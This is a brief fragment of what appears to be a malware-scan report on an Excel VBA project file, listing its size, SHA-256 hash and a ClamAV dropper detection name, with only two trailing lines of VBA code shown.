    Loop
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 108032 bytes
SHA-256: 588ae4e81b4d5c232ab336efba8c26aef5078789a901524191bf2498fb004b1a
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely